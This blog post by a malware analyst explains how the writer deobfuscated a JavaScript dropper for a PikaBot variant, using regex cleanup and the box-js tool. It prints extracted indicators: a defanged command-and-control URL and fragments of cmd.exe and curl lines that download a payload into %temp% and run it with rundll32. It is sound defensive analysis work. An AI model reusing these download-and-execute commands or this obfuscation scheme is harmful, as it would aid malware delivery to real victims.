JavaScript Deobfuscation - A Primer
With JavaScript being a popular programming language used in many web technologies, it often gets used by threat actors as initial stage payloads. Such scripts could have Powershell code embedded in them, further malware stagers, or functions for downloading malware from an attacker’s C2 server. Because JavaScript is a high-level language, it’s human-readable and logically easy to understand, so threat actors find ways to obfuscate (hide from an analyst) what the code is doing. In this blog, I’ll cover some real JavaScript from the wild that was used to download and run a PikaBot variant. I’ll cover my methodology, where I went wrong, and some learning points for you, the reader, to take away and apply to your own analysis.
Why Obfuscate code at all?
As a quick primer, its worth covering why threat actors bother obfuscating their scripts and malware in the first place; The main reason is time. The more time it takes an analyst to work out what the malware is doing, the more time the attackers has to run their attack flow on your network.
Your job as an analyst is to work out what the attacker is doing as soon as possible, and this often means modifying the code to add a print statement (console.log
in JS) to the end of obfuscated functions and dynamically running the code in a sandbox, letting the code deobfuscate itself as it’ll need to do that to run it. The problem is, if the code is so obfuscated that you can’t understand any of it, how do you know where to add your statements, or where to start and stop the program?
This was the case with a sample I recently played with, the obfuscation itself wasn’t complicated, but it was messy, and if you don’t know what your doing this type of obfuscation can overwhelm you. In this blog I will show you the general method I take to analysing JavaScript, or any programming language - and how these methods could be optimised and improved to be more time efficient.
TL;DR
One thing I don’t want to do is waste everyones time. So if you just want to know the easy way solution that I found when doing my research, see below:
Use tools, they exist. Tools save so much time and get you 95% of the way you need to go with deobfuscation. In this research, I used box-js which did the entire deobfuscation in under ten seconds
Use regular expressions to trim the fat from the malicious JS, there will be loads of junk data designed to throw off an analyst, RegEx can trim this down so fast
VS Code and other text editors have built-in language interpreters, so with the click of a button VSCode can format your code for you, no need to manaually go line by line to beautify the scripts
Going foreward into this blog, there will be allot of detail on the steps I took and why, enjoy!
An initial glance at the script
The sciprt I have been analysing here is called Nuj.js
, Virustotal link here, (it’s malware, handle with care).
Upon openeing the script in restricted mode in VSCode, it was immediately clear that this was obfuscated.
There are 792 lines of code in this script, and I’m willing to bet only a dozen or so are actually doing things, the rest of the code is junk code. Junk code is put into the script to bloat it, and to confuse the analyst. Its not unheard of for malware authors to put Microsoft lisencing code into the script in an attempt to trick people into thinking the script is benign. Basically, Ych a fi!
Let’s get rid of all the junk code to see what we have left.
Shedding the junk code
Now, we could go line by line and get rid of all the comments, but thats boring and takes too long, so let’s use Regular exxpressions. Regular expressions (regex) are patterns used to match character combinations in strings. In programming, they are often used for searching, validating, extracting, or replacing text within strings. Regex can be powerful, allowing you to specify complex search patterns with concise syntax. We are going to use it here.
The exact steps are as follows:
- Hit
CTRL-F
on your keyboard - Use the Regex search
\/\*.*?\*\/
- Replace with nothing
- Click Replace All
I’ve used to Regex search of \/\*.*?\*\/
because I want to clear out the comment declarations of \*
and */
, and everything inside the comment declaration, represented by a wild card *
and ?
. The two extra slashes are are to escape the sequence. See the picture below.
Now, with all of the junk comments out of the way, we can see a little more of what is going on. I appreicate at this point it’s still messy but we will tidy it up.
One thing to note, I immediately noticed what obfuscation routine with was being used, because it is incredibly common, its called mapping-based obfuscation. Among all of the junk lorem ipsum
code, there are varaible declarations, such as x449195806+='s';
and x808919187+='e';
, but these are scattered across 792 lines of code. What would happen is that the variable values would be concatenated together to form strings. These strings would most likely be commands, domain names, or other indicators of compromise, things we are interested in. So let’s continue.
Identifying varaible declarations
The next step is to start tidying up the script to make the variable declarations and values readable as someting we can use. To that end, lets use more Regex:
- Hit
CTRL-F
on your keyboard - Use the Regex search
.*\+=
- Replace with nothing
- Click Replace All
After doing this, you’ll be left with the individual letters that make up the strings. All the varaible values will be on different lines, as below:
1
2
3
4
5
6
7
8
'c';
'm';
'd';
'.';
'e';
'x';
'e';
'.';
We can see that it says cmd.exe
but its ugly, lets use Regex again to bring them onto the same line, as below:
- Hit
CTRL-F
on your keyboard - Use the Regex search
';\n
- Replace with
''
- Click Replace All
- Hit
CTRL-F
on your keyboard again - Use Regex to search
''
- Replace with nothing
- Click Replace to replace individual values, there might be some
''
that we need to leave in as they form part of an actual function - Hit
SHIFT-TAB
to bring all of the lines into the left - Hit
CTRL-SHIFT-I
to auto format the code into tidy JavaScript
See the picture below for the end result of the Regex queries:
The IoCs extracted through static code analysis
Owing to the fact that I did this in a few short minuites, the code is somewhat messy and incorrect in places, however, we can now see a bunch of the IoC’s.
1
2
3
4
5
6
7
8
9
10
httpx://shakyastatuestrade[.]com/IhA6F/616231603l988241708 = qui.q
cmd.exe / c echo | set / p = \"cu\" > \"%temp%\\\\dolorem.p.bat\"
ActiveXObject(\"WScript.Shell\" ) ).Run()
cmd.exe / c del\ " u311868867;\
cmd.exe / c echo rl\ " i750922179;\" --output \"%temp%\\\\dolorem.p\" --ssl-no-revoke --insecure --location >> \"%temp%\\\\dolorem.p.bat\"
However, this is where I hit a snag. I wasn’t able to identify what certain varaibles were doing, and some of these IoCs are messy. I can get context with what is going on, but it could be clearer.
Maybe I was too aggressive with my Regex, or I was clearly missing something. That is when I decided to go looking for a tool to deobfuscate the JavaScript for me, not least to check my work.
Using Automated Tooling
In terms of tooling, I found a tool called box-js, which is a utility specifically designed to analyze malicious JavaScript.
To install it on your Linux VM is simple, just run:
1
npm install box-js --global
This will install the box-js tool with the alias automatically assigned so you can run it from any directory. Once I ran box-js -h
and saw what the tool did, it was easy to fiugure out how to use the tool to parse my script.
1
box-js Nuj.js --no-shell-error
This command specifically runs the tool and ignores any errors brought up by the script, thankfully because my deobfsucated script was full of errors.
Below is the output of the tool, which was able to resolve the variables that I got stuck on, and it only took ten odd seconds.
Conclusion
So, with this being the end of the blog, now that the JavaScript has been deobfuscated, what did we learn about it? Well…
- The script begins by invoking
Wscript.shell
withActiveObjectX
- It reaches out to a command and control domain, pulls a file down and saves it in
%temp%
asdolorem.p.bat
- It then copies itself with a new name,
qui.q
(this is PikaBot) dolorem.p.bat
is then deleted from diskrundll32.exe
is used to runqui.q
, suggesting thatqui.q
is a DLL
In a later blog, I will do a write up on the analysis of this DLL, I still need to figure it out. There are no written blogs covering this campaign, and upon an initial look at qui.q
, there was loads of anti-debugging, xor-ing, code obfuscation, and an embedded resource that I don’t yet know the functionality of. Stay tuned for an update.
What did I learn?
Although my methodology of analysing code isn’t too bad, its inefficient and is prone to mistakes whe being too aggressive with Regex. Regex is a powerful tool for code analysis, but dedicated tooling is better. As malware analysts, we must strive to be fast, thorough, and accurate. Although, sometimes, if the code is messy, it doesn’t really matter, since we had enough to build detections - and the code can always be tidied up later.
Had I used a tool sooner, I’d have had the IoC’s within seconds, and tools are great, as long as you understand it and what you expect it to produce. With that in mind, static code analysis wasn’t a total waste of time.
Thank you for reading to the end, if you are a malware analyst and know this stuff better than me, I’m happy to be schooled, please shoot me a message on Linkedin and share ideas on where my blogs and/or analysis methodology can be improved.